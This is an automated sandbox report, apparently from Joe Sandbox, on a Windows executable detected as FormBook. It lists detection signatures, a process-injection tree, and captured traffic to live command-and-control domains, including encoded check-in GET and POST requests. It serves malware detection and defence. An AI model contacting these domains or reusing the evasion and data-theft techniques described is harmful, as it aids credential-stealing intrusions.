
Windows Analysis Report
eoIIBcxUj3.exe

Overview

General Information

Sample name: eoIIBcxUj3.exe
(renamed file extension from none to exe, renamed because original name is a hash value)
Original sample name: c2c8b9851e807452f57cd7a1fabec3ba
Analysis ID: 1653437
MD5: c2c8b9851e807452f57cd7a1fabec3ba
SHA1: d38ad61023caa4d2c2b10e3474ed5658d797cc58
SHA256: 64826dad12787e9f9989046e0b0d1f58704e52968dbb12de2fcc948dbf2bf2d0

Detection

FormBook
Score: 100
Range: 0 - 100
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected FormBook
Binary is likely a compiled AutoIt script file
Found direct / indirect Syscall (likely to bypass EDR)
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Switches to a custom stack to bypass stack traces
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Writes to foreign memory regions
Checks if the current process is being debugged
Creates a process in suspended mode (likely to inject code)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files

Classification

Classification chart (categories): Ransomware, Spreading, Phishing, Banker, Trojan / Bot, Adware, Spyware, Exploiter, Evader, Miner (scale: clean, suspicious, malicious)
  • System is w10x64
  • eoIIBcxUj3.exe (PID: 7804 cmdline: "C:\Users\user\Desktop\eoIIBcxUj3.exe" MD5: C2C8B9851E807452F57CD7A1FABEC3BA)
    • svchost.exe (PID: 7856 cmdline: "C:\Users\user\Desktop\eoIIBcxUj3.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • UJarIfYl5U.exe (PID: 6356 cmdline: "C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\Que6zKtSrCf5.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
        • sfc.exe (PID: 3888 cmdline: "C:\Windows\SysWOW64\sfc.exe" MD5: 4D2662964EF299131D049EC1278BE08B)
          • UJarIfYl5U.exe (PID: 6292 cmdline: "C:\Program Files (x86)\zMIFOiZAXONWnNJgulhCfwBstsQuREJGUYKVfWAqEMRolsEXcSOggVgKaDvzZPlj\UHcFP3RaOlKm.exe" MD5: 9C98D1A23EFAF1B156A130CEA7D2EE3A)
          • firefox.exe (PID: 7616 cmdline: "C:\Program Files\Mozilla Firefox\Firefox.exe" MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
  • cleanup
No configs have been found
Yara matches (Source | Rule | Description | Author | Strings):
  0000000A.00000002.3667412952.00000000030C0000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
  00000002.00000002.1552599848.0000000000400000.00000040.80000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
  00000002.00000002.1554111237.0000000005940000.00000040.10000000.00040000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
  0000000A.00000002.3667950546.0000000003360000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |
  0000000A.00000002.3669634420.00000000035D0000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security |

            System Summary

Source: Process started | Author: Florian Roth (Nextron Systems) | Data: Command: "C:\Users\user\Desktop\eoIIBcxUj3.exe", CommandLine: "C:\Users\user\Desktop\eoIIBcxUj3.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\eoIIBcxUj3.exe", ParentImage: C:\Users\user\Desktop\eoIIBcxUj3.exe, ParentProcessId: 7804, ParentProcessName: eoIIBcxUj3.exe, ProcessCommandLine: "C:\Users\user\Desktop\eoIIBcxUj3.exe", ProcessId: 7856, ProcessName: svchost.exe
Source: Process started | Author: vburov | Data: Command: "C:\Users\user\Desktop\eoIIBcxUj3.exe", CommandLine: "C:\Users\user\Desktop\eoIIBcxUj3.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\eoIIBcxUj3.exe", ParentImage: C:\Users\user\Desktop\eoIIBcxUj3.exe, ParentProcessId: 7804, ParentProcessName: eoIIBcxUj3.exe, ProcessCommandLine: "C:\Users\user\Desktop\eoIIBcxUj3.exe", ProcessId: 7856, ProcessName: svchost.exe

Suricata IDS alerts (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol):
  2025-04-01T09:04:00.390735+0200 | 2856318 | 1 | A Network Trojan was detected | 192.168.2.4 | 49724 | 13.248.213.45 | 80 | TCP


            AV Detection

Source: eoIIBcxUj3.exe | Avira: detected
Source: http://www.031233226.xyz/elns/?u8S0Yd=WgORCR1i1Oxy2N173PHNxeeoVlnRqt4wmv1r0pAESqOxOF9uJ1ZuDz19y+fBKvQ19VjIMx/MfYGLw8SfsuX8iCKArWTRjrJcin9XBz56FlEzKAwZua0RMSE=&rvNTa=V4hx68Jpk | Avira URL Cloud: Label: malware
Source: http://www.qzsazi.info/iwsk/?u8S0Yd=qwrlZwFE4brJ+UsahaR/fyoAcueLAHC/+A2O8o5gWslYlw69Sq2SNUTtA7JSar73r2ZaW9IDSPQ51rU7dBcZ5HvPPEpkNgGf01LcGvMYf08xqXnjg67beq0=&rvNTa=V4hx68Jpk | Avira URL Cloud: Label: malware
Source: http://www.cruycq.info/0vwm/?u8S0Yd=isZKPUheR62D1kSpREB90xs9KlsJxVI6aq2kqe9MkRSuWx05zEGLQQrQabjISr6l0kvk8u7/qEvONJ0dI6qocJ4rJlXzX8i5iUc6JOqvlFi4G71MGy8zaxE=&rvNTa=V4hx68Jpk | Avira URL Cloud: Label: malware
Source: http://www.sigaque.today/n61y/ | Avira URL Cloud: Label: malware
Source: http://www.l33900.xyz | Avira URL Cloud: Label: malware
Source: http://www.l33900.xyz/gwiz/ | Avira URL Cloud: Label: malware
Source: http://www.qzsazi.info/iwsk/ | Avira URL Cloud: Label: malware
Source: http://www.cruycq.info/0vwm/ | Avira URL Cloud: Label: malware
Source: http://www.l33900.xyz/gwiz/?u8S0Yd=+NKkcBFFncXrh1K/zcp2UArZa8QqJD46y5cIuYGPOv9Auup6QiWmFcsAYltWsFNOmNtwks48jDi5CWeuiTn1PXl+FEkaCR7LauSDOuuYEZJvaq0HIIPuZm4=&rvNTa=V4hx68Jpk | Avira URL Cloud: Label: malware
Source: eoIIBcxUj3.exe | Virustotal: Detection: 75%
Source: eoIIBcxUj3.exe | ReversingLabs: Detection: 78%
Source: Yara match | File source: 0000000A.00000002.3667412952.00000000030C0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1552599848.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1554111237.0000000005940000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.3667950546.0000000003360000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.3669634420.00000000035D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000009.00000002.3669745224.00000000029C0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.1553603148.0000000003AE0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: eoIIBcxUj3.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: Binary string: wntdll.pdbUGP | source: eoIIBcxUj3.exe, 00000001.00000003.1226558134.00000000042C0000.00000004.00001000.00020000.00000000.sdmp, eoIIBcxUj3.exe, 00000001.00000003.1229310134.0000000004170000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1453580986.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1455611339.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1553124414.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1553124414.0000000003700000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000A.00000002.3669992348.0000000003990000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000A.00000002.3669992348.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000A.00000003.1555403894.00000000037E5000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000A.00000003.1552885370.0000000003634000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: wntdll.pdb | source: eoIIBcxUj3.exe, 00000001.00000003.1226558134.00000000042C0000.00000004.00001000.00020000.00000000.sdmp, eoIIBcxUj3.exe, 00000001.00000003.1229310134.0000000004170000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1453580986.0000000003300000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1455611339.0000000003500000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1553124414.000000000389E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000002.00000002.1553124414.0000000003700000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000A.00000002.3669992348.0000000003990000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000A.00000002.3669992348.0000000003B2E000.00000040.00001000.00020000.00000000.sdmp, sfc.exe, 0000000A.00000003.1555403894.00000000037E5000.00000004.00000020.00020000.00000000.sdmp, sfc.exe, 0000000A.00000003.1552885370.0000000003634000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sfc.pdb | source: svchost.exe, 00000002.00000003.1521276795.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1521351912.0000000003024000.00000004.00000020.00020000.00000000.sdmp, UJarIfYl5U.exe, 00000009.00000002.3668785193.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: sfc.pdbGCTL | source: svchost.exe, 00000002.00000003.1521276795.000000000301B000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000002.00000003.1521351912.0000000003024000.00000004.00000020.00020000.00000000.sdmp, UJarIfYl5U.exe, 00000009.00000002.3668785193.0000000000DAE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb | source: UJarIfYl5U.exe, 00000009.00000002.3668098223.0000000000C0F000.00000002.00000001.01000000.00000007.sdmp, UJarIfYl5U.exe, 0000000B.00000002.3667414090.0000000000C0F000.00000002.00000001.01000000.00000007.sdmp

            Networking

Source: Network traffic | Suricata IDS: 2856318 - Severity 1 - ETPRO MALWARE FormBook CnC Checkin (POST) M4 : 192.168.2.4:49724 -> 13.248.213.45:80
Source: DNS query: www.031233226.xyz
Source: DNS query: www.031233226.xyz
Source: DNS query: www.l33900.xyz
Source: Joe Sandbox View | IP Address: 144.76.229.203
Source: Joe Sandbox View | IP Address: 13.248.213.45
Source: Joe Sandbox View | IP Address: 194.9.94.85
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1 (24 identical entries)
Source: global traffic | HTTP traffic detected:
  GET /elns/?u8S0Yd=WgORCR1i1Oxy2N173PHNxeeoVlnRqt4wmv1r0pAESqOxOF9uJ1ZuDz19y+fBKvQ19VjIMx/MfYGLw8SfsuX8iCKArWTRjrJcin9XBz56FlEzKAwZua0RMSE=&rvNTa=V4hx68Jpk HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US
  Connection: close
  Host: www.031233226.xyz
  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic | HTTP traffic detected:
  GET /cu04/?rvNTa=V4hx68Jpk&u8S0Yd=GiyPjuDYqsZvqLKmYM4GHNurLKTkn1JaETEmSESCF/xTQ/G1etY80XKQ2GWRx+1dZZXHyyqD4Xe5NPq0++XCoh+pAJUHiAjRAUxXwPGw8BXU+Gmi1Qpjbxk= HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US
  Connection: close
  Host: www.woodsplace.net
  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic | HTTP traffic detected:
  GET /n61y/?u8S0Yd=BOlfS7N9ZWkGRIMQvtCcANCNb3qAqq3eSjZAzliNIDKZHnAeT7/5dfTbZtimq+dx8K4CQjPcymznAMXPWSrBL6eCiEJPRGlRejti0K3snW3AOM+4UQW8vy0=&rvNTa=V4hx68Jpk HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US
  Connection: close
  Host: www.sigaque.today
  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic | HTTP traffic detected:
  GET /0vwm/?u8S0Yd=isZKPUheR62D1kSpREB90xs9KlsJxVI6aq2kqe9MkRSuWx05zEGLQQrQabjISr6l0kvk8u7/qEvONJ0dI6qocJ4rJlXzX8i5iUc6JOqvlFi4G71MGy8zaxE=&rvNTa=V4hx68Jpk HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US
  Connection: close
  Host: www.cruycq.info
  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic | HTTP traffic detected:
  GET /iwsk/?u8S0Yd=qwrlZwFE4brJ+UsahaR/fyoAcueLAHC/+A2O8o5gWslYlw69Sq2SNUTtA7JSar73r2ZaW9IDSPQ51rU7dBcZ5HvPPEpkNgGf01LcGvMYf08xqXnjg67beq0=&rvNTa=V4hx68Jpk HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US
  Connection: close
  Host: www.qzsazi.info
  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic | HTTP traffic detected:
  GET /gwiz/?u8S0Yd=+NKkcBFFncXrh1K/zcp2UArZa8QqJD46y5cIuYGPOv9Auup6QiWmFcsAYltWsFNOmNtwks48jDi5CWeuiTn1PXl+FEkaCR7LauSDOuuYEZJvaq0HIIPuZm4=&rvNTa=V4hx68Jpk HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US
  Connection: close
  Host: www.l33900.xyz
  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
Source: global traffic | DNS traffic detected: DNS query: www.031233226.xyz
Source: global traffic | DNS traffic detected: DNS query: www.vipstargold.buzz
Source: global traffic | DNS traffic detected: DNS query: www.woodsplace.net
Source: global traffic | DNS traffic detected: DNS query: www.sigaque.today
Source: global traffic | DNS traffic detected: DNS query: www.kitculture.shop
Source: global traffic | DNS traffic detected: DNS query: www.f66el619d.shop
Source: global traffic | DNS traffic detected: DNS query: www.alplace.site
Source: global traffic | DNS traffic detected: DNS query: www.cruycq.info
Source: global traffic | DNS traffic detected: DNS query: www.elevatetextiles.net
Source: global traffic | DNS traffic detected: DNS query: www.qzsazi.info
Source: global traffic | DNS traffic detected: DNS query: www.l33900.xyz
Source: global traffic | DNS traffic detected: DNS query: www.milp.store
Source: unknown | HTTP traffic detected:
  POST /cu04/ HTTP/1.1
  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate, br
  Content-Length: 203
  Connection: close
  Content-Type: application/x-www-form-urlencoded
  Cache-Control: max-age=0
  Host: www.woodsplace.net
  Origin: http://www.woodsplace.net
  Referer: http://www.woodsplace.net/cu04/
  User-Agent: Mozilla/5.0 (Linux; Android 4.4.4; GT-I9305 Build/KTU84P) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.133 Mobile Safari/537.36
  Data Raw: 75 38 53 30 59 64 3d 4c 67 61 76 67 59 69 67 39 4f 5a 2f 75 35 6e 4d 47 39 63 37 65 61 6d 2b 48 61 76 63 32 58 4e 31 4d 79 42 64 52 56 4b 54 51 74 77 57 49 35 6e 4f 55 65 6f 4c 6b 57 32 4b 72 48 61 69 33 75 6c 38 62 37 33 37 72 67 4b 76 38 57 76 50 4d 37 6e 30 34 74 76 69 73 43 43 76 44 75 34 6b 31 53 72 65 48 33 46 61 74 63 75 56 38 79 43 50 2b 6c 54 78 30 6a 56 77 66 6a 77 51 33 6f 52 30 68 47 64 42 57 38 79 46 78 33 7a 51 4f 72 5a 47 69 63 6d 67 43 65 36 35 50 47 7a 30 35 71 48 4d 56 33 6f 68 53 34 42 56 41 69 4a 75 34 43 71 59 46 6e 53 48 78 32 73 31 78 6a 47 69 4d 78 31 74 31 79 69 35 46 41 3d 3d
  Data Ascii: u8S0Yd=LgavgYig9OZ/u5nMG9c7eam+Havc2XN1MyBdRVKTQtwWI5nOUeoLkW2KrHai3ul8b737rgKv8WvPM7n04tvisCCvDu4k1SreH3FatcuV8yCP+lTx0jVwfjwQ3oR0hGdBW8yFx3zQOrZGicmgCe65PGz05qHMV3ohS4BVAiJu4CqYFnSHx2s1xjGiMx1t1yi5FA==
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Tue, 01 Apr 2025 07:03:18 GMT
  Server: Apache
  Content-Length: 315
  Connection: close
  Content-Type: text/html; charset=iso-8859-1
  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Tue, 01 Apr 2025 07:04:13 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  cf-cache-status: DYNAMIC
  vary: accept-encoding
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=1giYocPV4iM8un99%2BjzPQNTksSicE47h7r6M%2Bbma8nXqEYvqPTc6zEF%2FJHLabd8TS8fJkwYUTproC48GzrN%2FbVJhrp334Lm1Evb%2BtkEcRNBhEl%2BbNbwTjKhWgz2wMMqdn0dwTg%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 92963b2d4a8842da-EWR
  Content-Encoding: gzip
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=93653&min_rtt=93653&rtt_var=46826&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=727&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
  Data Raw: 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 41 0a c2 30 10 45 f7 85 de 61 3c 40 9a 46 ba 1c b2 11 05 17 ba f1 04 a9 33 36 81 34 29 31 82 bd bd 54 0d 88 6b 97 ae 06 fe 7f ff 31 68 f3 e8 75 5d a1 65 43 1a b3 cb 9e 75 d7 76 70 8c 19 76 f1 16 08 e5 2b 44 f9 44 ea 0a fb 48 f3 72 cf 1c 32 27 8d 56 7d 2f ac d2 28 df f5 e2 4e ba c0 61 70 e1 2e 55 b3 6e 1b f5 89 c8 22 95 e5 a1 95 10 60 60 32 44 2e 0c 90 23 90 bb 9a de 33 1c 4e fb 2d 98 40 b0 b1 29 8e 0c 97 e4 38 90 9f 81 53 8a 09 26 33 30 08 f1 57 fc 5a f1 00 1e f7 54 ba 2b 02 00 00 0d 0a
  Data Ascii: aeA0Ea<@F364)1Tk1hu]eCuvpv+DDHr2'V}/(Nap.Un"``2D.#3N-@)8S&30WZT+
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Tue, 01 Apr 2025 07:04:16 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  cf-cache-status: DYNAMIC
  vary: accept-encoding
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=o7ydtDJLN%2F8Tl4hlK3hVElUrHhf4x5JZ24Az1D%2F0frQHs3Htd6sazyOOA2QaUvO%2FX0Yn46HtzRWKutXBZuV8688doX4SGTppP0DFMXIoIq%2FyQ%2FaCN8HHwWSebU77P7GSw9CTqw%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 92963b3dcb48438e-EWR
  Content-Encoding: gzip
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=99818&min_rtt=99818&rtt_var=49909&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=747&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
  Data Raw: 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 41 0a c2 30 10 45 f7 85 de 61 3c 40 9a 46 ba 1c b2 11 05 17 ba f1 04 a9 33 36 81 34 29 31 82 bd bd 54 0d 88 6b 97 ae 06 fe 7f ff 31 68 f3 e8 75 5d a1 65 43 1a b3 cb 9e 75 d7 76 70 8c 19 76 f1 16 08 e5 2b 44 f9 44 ea 0a fb 48 f3 72 cf 1c 32 27 8d 56 7d 2f ac d2 28 df f5 e2 4e ba c0 61 70 e1 2e 55 b3 6e 1b f5 89 c8 22 95 e5 a1 95 10 60 60 32 44 2e 0c 90 23 90 bb 9a de 33 1c 4e fb 2d 98 40 b0 b1 29 8e 0c 97 e4 38 90 9f 81 53 8a 09 26 33 30 08 f1 57 fc 5a f1 00 1e f7 54 ba 2b 02 00 00 0d 0a
  Data Ascii: aeA0Ea<@F364)1Tk1hu]eCuvpv+DDHr2'V}/(Nap.Un"``2D.#3N-@)8S&30WZT+
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Tue, 01 Apr 2025 07:04:19 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  cf-cache-status: DYNAMIC
  vary: accept-encoding
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3cggA0wmiT0jKnh6xIWBkdquHQN95AU13jnShtu5EqCnP4LpDy6FrTZNa6Kz%2FBywhAsuRztA89LlRQ1w%2BVe8S73S9p9FJubGSjopAfGdnsbNbK%2FYF%2FVAJC6Twhvq32RS7JA3WQ%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 92963b4e4df88c47-EWR
  Content-Encoding: gzip
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=98150&min_rtt=98150&rtt_var=49075&sent=2&recv=9&lost=0&retrans=0&sent_bytes=0&recv_bytes=7004&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
  Data Raw: 61 65 0d 0a 1f 8b 08 00 00 00 00 00 00 03 ed 8e 41 0a c2 30 10 45 f7 85 de 61 3c 40 9a 46 ba 1c b2 11 05 17 ba f1 04 a9 33 36 81 34 29 31 82 bd bd 54 0d 88 6b 97 ae 06 fe 7f ff 31 68 f3 e8 75 5d a1 65 43 1a b3 cb 9e 75 d7 76 70 8c 19 76 f1 16 08 e5 2b 44 f9 44 ea 0a fb 48 f3 72 cf 1c 32 27 8d 56 7d 2f ac d2 28 df f5 e2 4e ba c0 61 70 e1 2e 55 b3 6e 1b f5 89 c8 22 95 e5 a1 95 10 60 60 32 44 2e 0c 90 23 90 bb 9a de 33 1c 4e fb 2d 98 40 b0 b1 29 8e 0c 97 e4 38 90 9f 81 53 8a 09 26 33 30 08 f1 57 fc 5a f1 00 1e f7 54 ba 2b 02 00 00 0d 0a
  Data Ascii: aeA0Ea<@F364)1Tk1hu]eCuvpv+DDHr2'V}/(Nap.Un"``2D.#3N-@)8S&30WZT+
Source: global traffic | HTTP traffic detected:
  HTTP/1.1 404 Not Found
  Date: Tue, 01 Apr 2025 07:04:21 GMT
  Content-Type: text/html
  Transfer-Encoding: chunked
  Connection: close
  cf-cache-status: DYNAMIC
  vary: accept-encoding
  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=pKnbKusfi5Uq1hNmMg%2BzEHhJaNjSL4c6KRIa6PV8rs3vnSSBJZ3EDxr4Y4OyG42xVFgtSPxtM9aj0K%2FkSpOQ3BfFYbrM%2FH%2B2bQqK3O%2FQmozbXWz0sUZiRCChMJNXoCe7IW3TSQ%3D%3D"}],"group":"cf-nel","max_age":604800}
  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
  Server: cloudflare
  CF-RAY: 92963b5f0bb81819-EWR
  alt-svc: h3=":443"; ma=86400
  server-timing: cfL4;desc="?proto=TCP&rtt=97244&min_rtt=97244&rtt_var=48622&sent=1&recv=3&lost=0&retrans=0&sent_bytes=0&recv_bytes=460&delivery_rate=0&cwnd=249&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
  Data Raw: 32 32 62 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 30 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c
  Data Ascii: 22b<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.20.1</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><
Source: UJarIfYl5U.exe, 0000000B.00000002.3671463232.00000000057FE000.00000040.80000000.00040000.00000000.sdmp | String found in binary or memory: http://www.l33900.xyz
